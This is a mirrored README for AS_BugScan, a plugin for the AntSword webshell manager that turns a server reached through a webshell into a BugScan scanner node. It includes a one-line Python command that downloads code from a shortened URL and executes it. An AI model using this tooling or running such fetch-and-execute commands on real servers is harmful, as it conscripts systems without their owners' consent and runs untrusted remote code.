Giter Site home page Giter Site logo

as_bugscan's Introduction

AS_BugScan

AntSword 创建 BugScan 节点插件

通过 WebShell 创建BugScan节点。

安装

商店安装

进入 AntSword 插件中心,选择 AS_BugScan,点击安装

手动安装

  1. 获取源代码

    git clone https://github.com/Medicean/AS_BugScan.git
    

    或者

    点击 这里 下载源代码,并解压。

  2. 拷贝源代码至插件目录

    将插件目录拷贝至 antSword/antData/plugins/ 目录下即安装成功

使用

  1. 虚拟终端下检查 Python2.7 是否在环境变量中

在终端下直接输入 python -V 如果有输出,你可以继续进行,如果提示找不到 python, 请先将 python 添加至环境变量中。

  1. 访问 BugScan 进入扫描器。点击添加任务,在节点子栏下获取你个人的创建节点链接。

假如在页面显示的为:

   python -c "exec(__import__('urllib2').urlopen('http://t.cn/Rqu1SmB?xxxxxxx').read())" -m 5

那么在本插件 URL 部分应该填写 urlopen 函数部分中的 URL:

   http://t.cn/Rqu1SmB?xxxxxxx
  1. 最大任务数 输入框中控制一个节点能接受的最大目标数,默认为 5

  2. 点击开始即可尝试创建 BugScan 节点。创建成功后,在 BugScan 添加任务页面即可看到你的节点。

相关链接

as_bugscan's People

Contributors

medicean avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.